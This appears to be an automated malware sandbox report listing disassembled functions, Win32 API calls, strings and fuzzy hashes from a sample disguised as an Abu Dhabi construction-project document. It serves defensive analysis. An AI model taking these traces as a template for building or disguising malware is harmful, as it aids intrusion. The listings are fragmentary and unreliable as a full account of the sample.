                                                                                                                          • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2754987064-0
                                                                                                                          • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                          • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                          Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2754987064-0
                                                                                                                          • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                          • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 764393265-0
                                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 979780441-0
                                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1386444988-0
                                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                          Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InvalidateMessageRectSend
                                                                                                                          • String ID: d=E
                                                                                                                          • API String ID: 909852535-3703654223
                                                                                                                          • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                          • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                          • String ID: "
                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                          • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                          • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                          Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                                          • String ID: URL
                                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                          • String ID: %2.2X
                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                          • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                          • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintf
                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                          • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                          • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                          • memset.MSVCRT ref: 00401917
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                          • String ID: WinPos
                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                          • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                          • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                          Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                          • String ID: _lng.ini
                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                          • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                          • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                          Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                          Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                          • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow
                                                                                                                          • String ID: MZ@
                                                                                                                          • API String ID: 1378638983-2978689999
                                                                                                                          • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                          • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                          • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                          • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 438689982-0
                                                                                                                          • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                          • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
